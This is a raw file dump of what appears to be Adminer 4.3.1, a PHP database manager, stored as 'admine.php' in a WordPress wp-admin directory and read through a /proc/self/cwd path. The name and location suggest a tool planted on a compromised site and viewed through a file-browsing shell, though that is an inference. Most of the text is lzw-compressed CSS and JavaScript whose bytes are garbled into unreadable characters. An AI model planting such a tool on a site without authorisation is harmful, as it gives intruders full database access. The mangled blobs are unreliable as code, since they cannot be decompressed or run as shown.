File: //proc/self/cwd/wp-admin/admine.php
<?php
/** Adminer - Compact database management
* @link https://www.adminer.org/
* @author Jakub Vrana, https://www.vrana.cz/
* @copyright 2007 Jakub Vrana
* @license http://www.apache.org/licenses/LICENSE-2.0 Apache License, Version 2.0
* @license http://www.gnu.org/licenses/gpl-2.0.html GNU General Public License, version 2 (one or other)
* @version 4.3.1
*/error_reporting(6135);$Lc=!preg_match('~^(unsafe_raw)?$~',ini_get("filter.default"));if($Lc||ini_get("filter.default_flags")){foreach(array('_GET','_POST','_COOKIE','_SERVER')as$X){$Wh=filter_input_array(constant("INPUT$X"),FILTER_UNSAFE_RAW);if($Wh)$$X=$Wh;}}if(function_exists("mb_internal_encoding"))mb_internal_encoding("8bit");if(isset($_GET["file"])){if($_SERVER["HTTP_IF_MODIFIED_SINCE"]){header("HTTP/1.1 304 Not Modified");exit;}header("Expires: ".gmdate("D, d M Y H:i:s",time()+365*24*60*60)." GMT");header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");header("Cache-Control: immutable");if($_GET["file"]=="favicon.ico"){header("Content-Type: image/x-icon");echo
lzw_decompress("\0\0\0` \0\0\n @\0C\"\0`EQ?tvM'Jdd\\b0\0\"fӈs5AXPaJ08#RTz`#.cXȀ?-\0Im?.M\0ȯ(̉/(%\0");}elseif($_GET["file"]=="default.css"){header("Content-Type: text/css; charset=utf-8");echo
lzw_decompress("\n1ٌ̇l7B14vb0fsn2Bѱ٘n:#(b.\rDc)a7Elñi1̎s-4f i7Févt2!r0t~U'3MWB'cP:6T\rcAzr_WK\r-VNFS%~c&\\^ruŎÞً4'7kQh'g\rFB\ryT7SSP1=ǤcI:dm>S8LJt.M ϋ`'C889 Q2#8А6mjh<9/:J)ʂ\0d>!\0Zvno(k7s>!R\"*nS\0@P\"(#[@gozn9k8n1I*=n0c(;à!*c>ΎE7DLJ1J=1L?s=#`3\$4uȱzGC YAt?;Qk&YPuǯ}UaHV%G;s<A\0\\P\\&ªV\nSUtr2 l^Z6ejAd[sնJPҝ8=6#˂74*#e!7{6<oC9v[M-`k>lڴIH3xw0t6%MR%jhB<\0AQ<P<:u/;\\>-ʈQH\nvL+væ<\rv\\*Ӵݢgn˩TЩ2P\rߋ\"+z8:#2J[i;zr3#ى:n\r㽃epdݍ 2c4k\rGE6_=SZUǷ㌞O?þ27cАhnƋu3E>\$J[q[\rI6.J\"EPrG̊GAW\r6k`.-B2>#hXu\r=Z bŁ(╃!JZȔuyOZM6lM[0䖀!Imy+p#agvW:qp\"4he0dAq-\"\"2@)o,,Rb`@B@Q\n芷Z=(r~l~hsAll\n7!1!#\0KALH(!ʘagH\0T\ni/\$4GaI!.Ř5M\r2 ;,LIJd?%Ո:N@b.25t:FAwBE,-\$':өu?tK;ḱи\0ouMD)k_Ph5MC}72w.QB8)8(DI=y`ed\0s,`ɕjH\"(b\\nl\"ق^쀭eE\nX!SqX\r7A0y7pPaA4(yJwm2.fp;Ƅ5JcqQz\\\0[H 3f'bFY\nA9_I(fӝqV4RIY&JF}{FTh9[7h\0T^jqjՔcWI@`_sVD[\"{13 <ll.[#įbu/\03va嫑Dp>2IDW՚kKAhH]FW!]ʝltɕR̭4L[YC cTj<c;sqp 5tJm6%J-\\eB=i-*%TV[&M8*\rbY\rih P9T-VɰZ۳49βp-`Gٛ'M:ř')0Yuc:!x#צ-l*T\nYl*DX V\\ڮ]y\n2r,Ɇ,d~ųs-+ֻu]\\BIw!OsԯlYCЂ:@ƜEU._)9uzvψS1_(Sq齡ryu+Z*6uy<z\\|ZK;eזoY;lx-74rkYY?GWt[Kښzo< tɀgj_!o\$ II.&5P\\]\nC._;siS/g:PɳauNͨ|aᙺ6ӎٞ3|{ceX<ep>N}~OҙBlj/KHdch-˾/ȶhԞ0ЌЋH8j6\n+d l7\r څ0N7eZ0`mnp\0\0}@[i0 ~4P\nАbЯ0p P4@PI\0``f\r```Yz P\r py Hq@ Qq `biUС@`))Zpj(--l1Q%pY\n1}\\*h{C0#H0TqAb=
f- qiAs'QZ\rRc'`qYQ1ҝ2!r\"Q1 Q!qr\0BDw\0q\$S\"]q@`豲@,\"r\")&&\ntbm02)Qw\n p(0*Ҏq\n&i\n\"p1C\".1y.q^2\0.Q0r)/\0ڔ!/.S+1R/3:5Ɲ11\nB43 4G#〜`Sa ra6es7q,搩j3q4)\$@*-9\n\"0',hS}\"3ss917S-=1g4 <pr.)LA9´ /9S?/5H}>.4LD;@2!A@Br-/+016S#)\"i@`P;.\n<)ԱV\nl8K#gkd|8l.lf.?A@\rÆ.\$J2tN#RrAEEeFFӦg8*");}elseif($_GET["file"]=="functions.js"){header("Content-Type: text/javascript; charset=utf-8");echo
lzw_decompress("f:gCI\n0Sa9S`&(n0QIf\$At^ sGtf6ey()LSP'R'fq]\"s> )`H2Eq9?*)t'ϧ\n \rs<Pi2IN*(=2gX.3NY4B<Li̥2z=0H'ꌚutt:e]`pX9o5gI,2O4хMS(a#|Gbx^Z[GuTv(ҝm@V(bN<`X1+9J82\rK9h `I8䛱St2+,I p9m@:x)Cx34P7-4r\"p3Fh-5U4͉\\6<D\$l9R4t7dD3pΓk:)\\;\r@t\$4O<!pdQJ\rH}:&Ȅ5YWJ`NbKNSad>2WŅbDj:9[21cȝ:X@q#4L'J+DHe3.OK˰pVt2wp;Ɠ\r?OzDq.-\"ZcX3!/>PFsɲ0(ʣT63sVQoSΑb߅^r\$@C r2) V)+nܷzl{K#9{ۯlmQh*ɗP:c]7=Li;2<\\Jbnn_iӴJ\nC:`N4̖'Aw:4}ۣW\080L3J;i)\\=/Nu=ZV6&ceap.[vtPZX`֔+z'9.\$\$@\n\r]_ٮhkkMs>`̖j%\\9ж('jA>BCd\"K\$ CA.².`.E洖yy\0D28t 68FLB*,|\nx\\@@3r WKQb,%DBfȳD|͌E0/2>Y!Ć'`fmH<BB0\r*\0GxnY4,L%S,v0XQ1HId`!.VH/×H0U0`LI8k24JYN&8xJk:AK㝡nW!I;'\":24~J8ᒑG\"M=\rZ'ni9FrRt3\0Ҳ2yB^b'zɲ(#d9It&WjNaC( jĖ?hjքZ\$0үJ A_\n!TO4<{a?o -?Hl\"2y=먞Rф͊P&G4%()\r5MLT\0xBI=ltv2Jhv~/:p:8\"д50#*7\nq>G\$): \"#KfI!v+?{Qg{RQC}#iIbgX}`}3%@{_k}0ȗp!a<7eF?XD, CkUL>1܇p0#\$V)pYs5A:U(95,F+&*{-::7:ʙyPX+\nI;\\sP1rNJAT'-k?Y@fbRJimB~K\rKt4;OKc9%H5d3e8jP[s9,ĘbzKW&ed8)uP># P&P pbaͨy\$3}{hy(dW_:'API\"![`n8i/@P fЎ冩V sC8NyhtEnAj.-6qwJ?ùAhu sAO7j\n ]0^ \nY\$Ζ_\r\$u*ޡEx/dpdRd:IoDsQfI8,KIsM@aq\n/MRC-aa/H!4FIpŔMϫ_؇H9{.\$W#{Ү:S('lMY:lʞmD\$\0\0'~ Z@VL\"jn5NlKfj&MOdbӰNO\$i)N(!P)0+6HpNFЖ?L\n-h0,.e\"6m# o&gZ@Pk&̺_%\\\\'\0]\$(5N fq|p `<R I\0L|\$(ŬTkQ6kB@0HP\r#u+ܲpTZѱ/\r yPp%\0^8\r4\01Qn*+B8qࠎF\0дܱ\n.H%3&PFфX`O 9RB\r 10콇O X^+iArD4`-.i`4',\$V,_c~;Bn<1\$,]%lD=\$).1b%gz}G21]8uPD] /z g+'7D\0]apVL0+`Xp d-h+h(\nfs2,2@z .I``*1l?RW..c%\$s+46\$CrF)0\r1-`ӌ jL\r8l0*.LKp\r\r/rLa82K1nb4L,ˬ\nijri#ǩ81bx2\$N\re \r\"8'\r-PY0YbS\0\\jK+q6Vh1Uz`pRECX%F 5F4f-tPID6\0NFN4_0\riL@nP^%'LԨG\\F&4I*5OOP)8)*L;4E]\$\0L3E EkIt%e\nb(SM}7sۏ)giF&-XH BM5~jrPj̾-|֤9p5;o5c\ndu \rLh'\n''< O\0e,. \"t\rk^{__gT`\0 Mk?2\r:Db%]U[1cu[[9]/ EV>k@a\r_\"b6] EDQ^)ș@PsITr vT\0VRW@ iR2/b,Xr j^0kClfl'8EoWImp룶/&+Xk.\\40dr\"kb\nH\$ТKCoOoG%\rύl ]P7\"*hPP\rc_X[`7:`UߨIwd; x t8d\0@jwv { b pcy\n, u< \"uyE:Z`<LF2cwSd%uwu߀#pqNNN\n#@E#\"@|d%kwc\"*xw\0uX.l&XeMB'@6Ch»`SwGӈC[V1\rb\"\n\0\n`J+a1\"lW}z]zjdO>!G\0[\\F| ^\0ZJ`b`#5`WE;(!``\"~EߒghVGr_ujQ*d'2g/-\nh^da)וE:HhvEvsB9w\0MWNL 3-=#@%D!XL*V;1ǘMkX&r<[%UeqWW#\$蝌lIVAW_GVF\"&f(odV1*wr0F\"HvTqhw*@s.0g81_zfA)+<u\"F_lO#n{XYwv, HǓc{n7<8YfB\0Fe\r:r\$gy6=p;49\0b%a2Bɐ\n (\r@GF@%߲Š1Гqbs+Zg%@t%ࠚ3\rD(Lv.\\\rR ^ A2\r־;yv~U*@<qWaSW=yE<V@<13\$\$PDw2U;]%!\nD)I/h~<+0s34-G4T\nu3<TckWWGUǍfme\\D!*vx3i2w21|\$&ԉ+bG\$v!r*-4qu\ryL0tXƅIbdS<aG~Gm gx-TYᙖ!(wH\n4ag)`%@rY%(qX!c՝\$Dy]mjbpR4RRuXp/6 he+n@cHɹ{Ŕ.\\bmVpP`bQrP\0`\$WWRq2x%bY1>1u&b\nVoNj\nEĆC3G\0ep<~B^ A%/9;v\\[Hl^UӞh.\\Y}+ YtqƉ6\ns\0c:3*}7z\$d\\\" WY+Ie\0S9Dt[rךC֩b~馳Dw/lL`~ UV_\0\rw)bƦ8G%WUAv(HFgXcn92n12l\r?\"t\0XPsYmfF?mx5}H_XcyκC.\$`kd5.rx>Ǣ7sn3<gO(\\@W:Pσ{_FhgLӠ><6~'K0?@EA_ 8H.LG<d YokF<p(j\$9?V P?)ؤDuLbj} \0Kp7ZsԀD)\r:JQ֓}\$bAu)\"XM%pQPQ\$@\\\0V7TMX*#)G\\KM0=J&`\"x_bB`C?/ŪBUu83NR_]NTܿDwI\n2D:Y q1`BF!]W5,:1(0tQF p7'!\"@80`7\rhC\nXӡ\rAC m Q&l&|cLd\"#\"PK56Hʄbʗ&+#fV/Sh(Tdu<=xd8:m!68,JP~RPDZuO`0XAwأ0eh^C\$ 8AP(#+KN4%\nB>2%{0Ƌ0ϟ/z Pʚ @gDzDԊY॓4,%l3WULr[9HgT`@7\rN O+D>I(bL}\$DžIXBҞ(4!h!E\"w\"0qJ\0UPF\0o_\0cЄ\ng\0T}\0#/tXJBKK/@\0y PIvA1ipm@y93HY2!`/<rIy Bs@u :b\"}%#ɾ~[:p2/.!9CB_NcqH8ܤQrcyI\0\n7nBi)`?ML%XMNH4BR\"Og[H0}C4샠,,\\f5 d\$_'|Į&P\0NjK\n <?*%Yı`@\"2!PtP.iiT|@2 RG dK'&(T#Wt\"c\rS,a@[3hG\$\$+RR̶Y 6sltҒI*v&z4,\\YY{G^J>̹%.fKx:XO.}L[G&eIaKb琔%OB8l҈>(M CA;oK+%yĀ%|\"#hGD\$ fBMdC\\ֱLT(q\0.P\nZUjg[#P@ǔr8myMQ6\$sDָ`!8:4ф,ap'FE28MmD2@.U]!5I_\n'(iuPKp9@LH)XPWv\rD']!0B#R:D.\nX8H\rs^0˿+9Sb0\nB7aty<|&#g@5qDȂ\0/ A\"&1fF|g5\\rrIJ'2PJs鍞li\nRyCa9ߔNp\"'H7͈3MTRdBRp|z:1Ph)(h[BPƈҞ^\0\$:6KB(Ҙ\$\rx[BGH 6cn8\\ \nYi\rd\nU߄\$;.ˇ*_\n=Qy\n< 9OxF}\rF%M4\"0\0f(d3a\0p0`H꤉Dպd3YICx+?Yi ?1 flCFP[BS@!Ln#su\"Z\0:r|t],7)1-4&Y`Z7p奦ʛ@ӽ -hN-֛iJ0ҝ3Xj9*.T7I`@{`neQ@)`B\"h0+Z>K*YSjDRI0\nj<n/(47ĉhhGj7;!pQϜBX)KP u8jR+q*MiM+TNs@wCbFV#h(@\rlLяނ9ǀr3>i\r:>VeapU)G2trTw 5pf#um3f`8KI& Fmv\09tP1~\$A\0S5'Eyz5qW\$-_KEyҽq!@kTlʓe'\\\\cgi_5\0zViB[]8\n+]:Ӱؓ\"'nW}Q.IXn|BŃ]kl9aSuʅv-ay<VItΙ]]K IGݲ\rB ̭S#Vsh'bT3b]Ym\\S(7&{,9z`Z&'oh\"m48AA}돇WňST-_Ze\r0@UsݮF\0-y'̺BveC݀wZKZmpe |p0YeԴE,{qà 7hSphTMK\0REak.*\"LAL&;h٤:5\nm!CېUgJYnV-F9 ّ蹊VYȔLti\\tn\"'j_ژNN`._թGT\n]dډaf\nembΡaIn19U']3:Xܔ#kdyBW2eXn.KY2T),cmcP1q`cee.{p*[>`{b]L Seb|)Y:ncS9k7]5Y]ŝU CsBC|gЋt98Ոt6]l.mᩖ 8kUy^|y@*ތ1\$ *']f7H1y0}j!彡cV+5}d8U=ޱꯛzۘF@o3_fa)~`!iG]E&BlΦ#}\0ȑ63\rTnk]\$;Qjn:ZZbZ&@g3B\$g\nd5M/Ku{#]ssqfuQ3Tvc\\Muk#eBQOD%Y<_6b !T.]>\0u=~pGV6@'U<kZK6\r@-;B.t\0UMaUn\0bm9# T?Zeڈ\rӑ\n6G@+\rAݲFaA>0ˊ|7EQ\n\0W,7.ᣰ(%bàMU|-hS+9nAQ3 jD|6ͮgJrXnXN)|MpRc&\rMCyzk\"dCPG.?yi1JCl^\"9Y ~q18#0) _Blャ8eC,̄A]NCkki(p=ڕ Ѓ\0A\\m=ʙh1iM[ ի_q%!rO}MG5%q.i^GfYi/dlLR0z2̷\r\\gF n tfi_e͢RD@KiXp];6o\"A%97F.ˣZuEks\$ycf[-s8P4\05afث@noZRڡH.ub5٢ȳKiDFݍ-Nfp?H!ꡈyjs\\e .]lpw^;\",h~Iȫ9,a:jF7Gg38?JbH+lW\0cֹWh SEs%Wc:X;-DF(֭64Ts3)Bj[fn:A@\$նZ&sWKUؗO2hZvϻtҎtCVwJͩF^,p?L \$8Es|D4(q)'NWuG.`7[B/]'z1ƉQEƒs:P<X5L\0}gX\nz¸=Y>yѬͳɖ9e{ik<ZY,KAƹb˙Z\0\roN}hIa!|JX!X)B㜫NTXdJ+bر\nLR=H{zJHE`}G\$ޒHP*\" 0*@A@@#, ='X5̈bxXy7%]\rJ!Jhx\"cQ\\ݮgyۋĎ 2mL;UERQKWÕ\\ѥ\$f\\RXH' /c]˼xe3VYF0 l\$Nu\$ɹ|b\$yJ`>S3ͬ)[sCy-a=CK2K!Fe\rܡH#gYubTBC# =:˩\0o4u@]N`V8OU2xX?q^Ng ɋN8BlMTU)Dy\ru;cQ5ugA&\\yx6./]8 2PE>7u)Œ)3|M81w`\"zeR8 y+]9\0IJa1Wj>lu=,Uy8'4rt-_xWSMdPuukaP=gHB\$\\\\5ēÙ+[+W GSB9ptdrr!n^\r˖*튼E:v-/319r vBͽg`9o^\\J1 X\\#(sm؏L5\\SREODPlN\nP\\hBd#P\"9݈FSK9\"0f,9tg}zɪ&6M-F)uIIX_FppH\\#wNjb\"ml?\"\0DIIP P݀V0\0DRep !γF!9A\"*BObb%bg'+K٣12SZV-m12Bt!=?\\o\02;\\ė\$]+4ٴ8owa'A&o8\n]H[ZO i8c w\nf*j=yyco\nIyRL\"ݫ\0]Oe7/r`9Ingyh! ێ?ˁNWwƑهG_\\u#ma݂ZOY>'>u)0#SA.zpeB>[vi*vOX;Hf0R");}elseif($_GET["file"]=="jush.js"){header("Content-Type: text/javascript; charset=utf-8");echo
lzw_decompress("v0F==FS _6MƳr:ECIo:CXc\rJ(:=Ea28x?'iSANNxsNBVl0S Ul(D|҄P>E㩶yHch-3Eb bpEp9.~\n?Kbiw|`d.x8EN!23\rYy6GFmY8o7\n\r0\0Dbc!Q7Шd8~N)Eг`Ns`S)O/<x9o3n2!r:;+9CȨ\n<`b\\?`4\r#`<BeB#N \r.D`j4par㢺>8\$c1cc{n7ANRLi\r1!(j´+62X8+.\r!xh'6S\0RO\n1(W07q:NE:68n+մ5_(s\r/m6P@EQ9\nV-\".:J8weq|؇X]Y XezW 7Z1hQfuj4Z{p\\AUJ<k@ɍ@}&L7UwuYh2@u P7Ah3ÛXEͅZ]l@Mplv) HWy>Y-Y/hC[*F#~!`\r#0PC˝f\\^%B<\\fޱ&/OL\\jFjZ1\\:ƴ>NXaFAfh{\"s\n64?8^p\"띰ȸ\\e(PNq[gr&}PhW*r_sPh\nom#.\0@pdW \$ҺQ۽Tl0 HdH)ۏ)PHgUBe\rt:\0)\"t,[(DO\nR8!Ƭ֚lAV4hSq<@}gK]]=90'wA<a~WD|A2XU2yŊ=p)\0P sn3rf\0FvGI@%+_I`\r.NKI[ʖSJaUfSzM%\"Q|9Bcaq\08#<a:z1Uf>Zle5#U@iUGn%Ұs;gxLpP?BQ\\b龒Q=7:ݡQ\r:t:y( \nd)\nX;CaA\rPGH!@9\n\nAl~HV\nsիƯbBr3\rP%ф\r}b/Α\$5PC\"wB_UgAt夅^QUjBvh졄4)+)<j^<L4U*Bg*nʖ- 9O\$طzyM3\\9.oE(i7 tߚ-&\nj!\ryyD1g]yR7\"~)TZ0E9MYZtXe!f@{Ȭyl 8;R{8Įe+UL'F18PE5- _!7[2J;HRǹ8p痲݇@0,ծpsK0\r4\$sJ4DZI'\$cLRMpY&iz3GzҚJ%P-[/xT{pzCv:V'\\KJaM&Ӿ\"eo^Q+h^iT1ORl,5[ݘ\$)N\n[b|;p74ܔ¢IC\\X\n%hI4gP:<k1Q+\\^咠VCW`83B-9F@nT>lj-&`9qPy6\r.y&ảE80kAVT7px)ޡ~M!EtP\\ϗm~cB\\\nmv{9`G[~xsL\\IXwy\nuSc1?A*{Ϳ|9/E4/W[ȳ>]rv~B PB`TH>0B)>N!4\"xW-X)0BhA0J2P@>AA)SnnOQbrҦh@ȋ(\nFϖƙ(γP\0No}l<nloq\0/Q\0of*ʑNP\r/pAY\0p\\~bLh ! Pd.y\no\0жPptPovЂkn\0z+l60PoFNFOpN`\rog0}P\n@15\r9\$M\r\\\ngg\$Q \rDd8\$kDj֢Ԇ&bѬ갿 =\n0Pؠ~ج6e2%x\"p@X~?цZelf\0Z), ,^`\08&٩r kFJP>Vԍp8%2>Bm@G(s\$d̜v\"pw6}(VKˠKL ¾Wq\r̤ʀQL%PdJHNxK:\n %fn%ҌDM [#T\rr.LL&W/>h6@ELPvC6O:Yh^mn6nj>7`z`N\\j\rg\ri2I\$\"@[`hM3q3d\0ֵys\$`D\$\0QOf1&\"~0`\"@ZG) Y:SD.S%͈3 dmU5<SSZ3%r{e3Cu6o73dL\"c7LNYk>.p2Q3VذWBDtCq#C@IPDT_D:Q<UF=1@\$6<crf%,|27#w7Tq6sl-1cPmq\n@5\0P!`\\\r@\"C-\0RRtFH8|N-dg\r)F*h`CK41ʍkMKCRf@w4BJ2\"䌴\r1Q42,\"'xyR%RēS5KIFz #XP>f-WX\rpUDt&7@? }O122#UK*)긋0o<>]HƿrLGNW%M^9X:ɥNsE@xy(HƙMd5<52B k!>\r^J`ISN4'ƚ**`>`|0,DJFxb4lTؕ[[\\Ԡ\\{6\\ޖ (#mJԣ,`IJխl jj֟?֣kGkT9]3ohuJW\rk)\03@x,- 5B=࣐#gf&Z`#oXf\r Jh5rqnzs,6otDybhCtn9n`X&\r'tpL7Η&lZ-w{r@iUzM{rxאmSB\r@ H*BD.7(3XCV <Wу|dq*@@+x̼`^̘߬__NDX\0Q_D]}tYpfw\"3zn«MYZR\0Q?{M3*1 ,\"g*U*̫zҌW5NV2O-|ɍӁ,]Bd\r/OtÁ0xƆЮOC8-0\r0@]X̊\\\00Nу4i;At8Xx\r݊7<@Sl'L9W θϬıR\rϠ|Xa7y\rweY!EcRIdBOk28[mJ+L ٸOXpf9ѝDϛߪw@˓Y\\yAc٣Xg%1j X9Cc݇RQFpd=C\n\rՑdj٫xE2FXx_ţ5}qM%ZM:\nzWX7:ZinpY;>ʘɆ:6;ZX0̢#cMyUi2,qF˚bJ @gG|4gmzW )r|X`Scէ˙c!B/}{4J\0ÝnKuz @mѮ߭y͞y\")uY睘scy둶y7||{Ϙ*)4Y`ϵ[v^NXW7;_*x\r߉xm+m \$\nl);|٠ڙ:N:_8NU5;p+UL\\9O:IzQT)XGJ{w8ʼnU\$PxTYpjhJÀJ{@ǂZsh˘X\0ۖlӖθY}^@u2S#U;È|P\\#|<\\J,\\̚E]Wl,ɖ<Ό>Yn),ΙrԼ⍺] \$qDJ=XI-ŀallõ]\\w(iC׃t<i-u[uVD֓Q¸xbkLI.k@N[l<o=-]1`蔼dM7@%C=]/|-q*CO~Qs`(Dɲ[>kRu\\+>)3PP6M%pԌA3qmu2fzۯ4s `ێ-kS%6\"IT5~\"Ut_ TuvֽYw0I7L\$1M?e@3q{,\"&ViI?mUWR\"uiTuqj\"G(-By5c?wT`eiJtbgU3@~+\0MG7`\0_-?\rV?FO6`\noϚIn*pe\"T{[Гp^\nlh@l0[/poJKX<=9{Ǿ6<eߏAxǂ4x[͞L~>!OQx{ZVFԎ`~IߖL)Q[TMT*BC~ \ngÈŅp9zKwzO9di^'+Dz4gHALy\nr<IjKQSn==\r.o7½%a;kmXZi%Pi\r/L`pR0&I (\\.*m*(֎\$\nwХ8a\n&Um M֨P+\"Ly?M\n2 L\nbS Nr!wjw`\$rav^qF6i*_x\nfI:B&6@ɓKEDQD(V`.1\0Q\$FHTzІ\rjkzMY(61x+%djo\n¦\rg\"Ɍ?1- 3hX)yj5rN#Qw{_G)1i <ZpX\$?=%.Ү&%\\8w!a4<JB[ĺu4%47%gѐ&Z(@ E{@#2h@#џ@\$8\n\0UjA(ׁ2O8ڀ5@&'\nD\$i##t\nPTs#]P* DucPO|pcP ގi#}:<\0\0ťlo#}FRTp@' `QycTp(Ɗ@eh\0Ձ8\nrx c<`N:)DY\n*D2{dZ)A4cZL2<\\\$r#7!N{O@\$< ѢVZƞ52.A#D0\0I\"P'H _)x@*AOhhI)IL1%JIBgi\"pK2}(C=txC&F ro@@'% HTᏈ Ԙ:=)\0.]5 .(pL!8\0 R\0LYabk6)Y Ԯ hzZIgVO3oLg3Y2ۉDoP`3̸ec-r72ԗDBZ%/I{M\0ṕ.`o*ԯ%T\0&iR\n+o\r^2q\0\\I@ K#peC*!>/%|ȅ̒ގ\$)1P30(\r+\nZz))\0*\0k2υ(E86stf&+;76&K_(9f,@-4l\$ۂe7\0:lLM7.\0|oJ۩Zu̺'y{H,#\0vU@9! '&G@_-ٿt;:u<LiΚ_ꀝأ@U6#_L'~/m`\\T']=ItǞ)qs9a<RPº|tt&5sl@ KwSl:9NwS|gOAП<BȀ\0/z@ =?=iOkӟ=\0E@i\$BנhO\0>DPUцjH9FBcCiBwMtxPM?p=8lg~ta%]b\$\rra,6tW)\0UF |쓢vhQ*Ol.C\$\\ցRR<lc&Cj3%ZMz9GpY\0i\$Ddzt[')[)Qkpi0#cþNE(C2L @9hEJ5,h{&Jz0nv>[j[]KRJ>.;F=Rڌ<rM=Ԓh^Y\\Rmn Nn*gB5^Q҉@OxHIT9)(&}A)P\\/_!́Hڑ\0B\$z4TYuJv\0ꏃ%@32\0Sm--Gi@Q%jY+FuzlSW3ŷOrU\$E;M\\Աu/jeQ,#JXP<UHTVV#UUbOUDZ⢵8UJuSg)XDZKB\n@2x@d& eܫI@Fw8\$'IVVU\$ET_*d/FCYdpvG3њL^(`j2ScWJQYiHBckR\nU\$j\nZAiU*wKDRxWL+f@A4GzR\n5b\\_ 0C@\$X\0+]\"?n+QIj\nx\rB`SM\ro@6X\"{\0b)McMW D_αv@{c:%[%C1;AƈTn \0 ape~U5 sVe|M99 h@\0~@. l\$?id{fBF0VZn@StN\0oPchGX^V}۴Z,EĀk\rhGDYd\\zm\$UfD ɀӂ\r^CRV*Ǣ7X&m7eY\\V4ͮ辝\0>ZfSفfWJ V\$EukKP[\r\n_q}L}eMmu4V݇RZ܈\r k\r]a)`XBv02ۑ^;t=\"kaYB8J_k)f;FU`GWNw,\rq)\n( eR53\\NW®EؚS5B;W4J %]5Apm ܂߁\$.-K!sCEt+D;7 ON˲cjOPKFO\0(|k *YD5;s@6@QU\"\rb?XJvnAHoPS\$Tpbj1+f3&@ʀQw8@;\\㬈ĉNxb#Y`:kB8NoS(#Uݩ(Y;:eĹkn eXZMi&\r^d\"W\r~[aV' (#Y\0}`W.u|4V*Wl:mn\\\re/ikm֚UE0#j[pD/^hfWςL\r_ᬹ-TX[*qn\n2*ǖJ\"YvQT2I߷=DGKXK\"E)\nYm4!}K_ D@wm(\$@\$Aj+\\4ZİvdSmX!ho!F0lUz8Xn#\\͈_\"˘`HB]3\"z0)7\\w.fy( p0\0XS6+ *\\Q\r\"<b\$tDq\" ?io],!{g|g\$(<vx𡎘%GHE\rXf=X)QKXq:N_5.(kgBZ768Ccr,<#y!\rѧeWtEZb\0Q%bTǭrp\"(A%`xba}P0vL1&>0dD c<6P3fVD~ 9b\\I,~\rxs\0aK8CE+Tl#V\0|>\$hG8XI@\nT\$9,Bt/u@s8B7syՙ,]Dy5neμ9)j^\n78Y<U<iwH\\C4cA]X8)\0lpSCgCM`Q)l(.'=aIxs;TB{xppUlT2>efu99\"^֍75ui'@h]L9^ס:D9̊0db칗6Ͷn7s\0_2zٝ72NQ/3A:tH=D=y?i8SȢ]פgCIh~PtF^u54;Fu\"+y?\0ֈ:ʘu\r<<w:*:j:-Ѓ8I\\u%J*wSԾc3;yK6HKmuiLT%N:NΑy\rbfuY=uE34ڭWN>mInx&Є'\0sok_Rz^{u}7zBF-diYYe 9kCHn'ז5{_:?65\rg/`ZLӖtѱ -q飐|\"G\rmd<z{)B-\nIN\\\0Asx\0Tm}:hcN8`/O\0\$0K=F\$y\n\0 -PvCxZKIِO6cg;;Fś4@J_@\0^yP@O0v9Jn Y.C]ps~AXBxl-oqTw`hmvıgw\rnt[0E3x۫\n7<n0xmiD Ŵ\0|粎)-}H#CGu0Ӯ6}kR6\\z{wE\0007Hxq;;m?r\"x,'˃{?w;q#ܟ Q<su\\xgpSr/58u'\\N \\G8&qD*oc<5\r.Κiqצ\rgl^\0A- T@6]\\\n(CѢosqA{|9sh\rSi6%\"g1AzE9| + B2yQCM\$%sL9' 6dm\0H !?(\0 >sX\$xe^nPI *\0G6JQ/hV[l\n(Esqr %\0ȕtfw)qdY8H)<{a)E@@Ṡ zWP!g\0ux;Ȝ @8)|ĄJ.Һ<NNJ]>s{\n[Cվ\\⸢~`<g\0zΖ2ts\ro\\\nmLnu-Il\0vy> Lw1;nel5`럋2@:Ld\0\$ÖU>]l\\)\$C\nQLB}{1 ;t#? {L%1O/vSMeCכ\n˯L<#@b?tM2t*^(,;́7ؙ[y?x+3Aucg}3D-\$t\\g\n\$\n*:(QXd~02x%G=-:;CpoS}ITQO|#prZ\0ڐdu7H/6M0=G@*#'ˑGGMؒ:\$4ľG0<ܙ&A(ŢbͶG\"y@Dž\\+縈>X@ĺ c3 <+ d(?!+¼WQOzkAݏ3Q\n!e'9=痌YKөK\"ԦEvq/o^ 8DEG;8\"o7PdE݉\rܼ8{ED} (.ܚ\004\\=2?Hv~(ex=~#>SlAy S|2FA}l,Cl5b}ltUfW6AgW%:g%b*ߥĿ̦y8.fI-ne z}fQ};%}e0xBR:>`e[z}{>Ϸ}g_p UiUZʶV؝D<;Cb;ŕE|O-~3wK\0tg!~csV}²p+M?WNc\rmL,l{e(r`a!'}(Y1U?toF!Ոh|T\$BopXhX\\~가iǀ,dXJ:pmЁAm!(h@:\0u0\"6,u0K69p>\"\0(>ey1xY\0xBnĀ#À<?\0#/a;u ۂ\0\$@2`O 2@`;@Y >7@@B*\03ѿNX+?6H:,?\n*#Ԙ!=f[;á|L]q[႖N\r%k P0'<6(DAOBnt/Zr뻏!1^ϡI/uC !k֚K`\n\\+<IO^gD#c\0Z pX8*p3>\nNA, ;cءb\">%P!IKTJķH[Ć&pR<f\\ Kۍ̐(V;\0ڂy쵄!)0x(Pz@jo\". @=98!A`\rab69\0E\nk%BH!P`\n߀*d&oT3%Sh\0B) 6B`R!623p\0ۏ6B69|@.p@>(V@\0*a/ܲT#&([+0h,O\0χr\rc9\0Cϙb\0Ț9e/.C9hC.1D C:p8\"OY0=ؕO5]\$/2C/Χ\r7Cf.`9;+&ǃ\nAL\0002KoK?p\nCн1t(=6ҿc a\0lVHjnVk\n暢>pY<;lT:1bމĖO\0}n\\\n@Bn>\$# \n!̈́&A8BU&kg)P\rdE@XO;˧zbHBp>LB*Dq>tD`6\0,Iq\$DPJ !XDEb=KrD\\Cě|DR\\J8n1/DkLO\$(\n\\H:a'DJQ7E9I;=k\\FFDSnE<bE8%PENLj E\0006;ļ0V6%HU\nZ/X \0Y*|V̼1dJsO[&2Z1 * \n=u1mA#h)Q_sH*]/O۠=_>b=!C23pkc^L\0\0Ȇ8*x6\"@ Eoܑf;f.\";6ʎYX3Řn;븑q3,X8^ ׃\\.\0C(O+%P#Π\n? A=eÑAO\\]ۥ=ԁ!c)J>B#D4doHA\0:nƟx` 뗡5P 4\0>\0F%X!;\\f42';dMscY@3@8w\$? \n`ÏBN@ >u@(\n4P)\0#? o(\n`)p[#\nCQ\$u@ :\0'\08Gn<45f[3hc(H,8}!lrM7(r\\|J\rFIvn?\0(`':4pa=Tq!x͌^F֬aT9B\rzX)^z|TG<s2bu*_!L͒!\\p'H*D!-HK',VGeH#jcp6@<\r\0x\r5M6Zdp7#<25t9\0#i#|#\r(\$:?\$`@*h>@\0hW 1\$JrJ+\$1G\$kEBS4Dt\0[ĔQ\$rX\\05%lIc 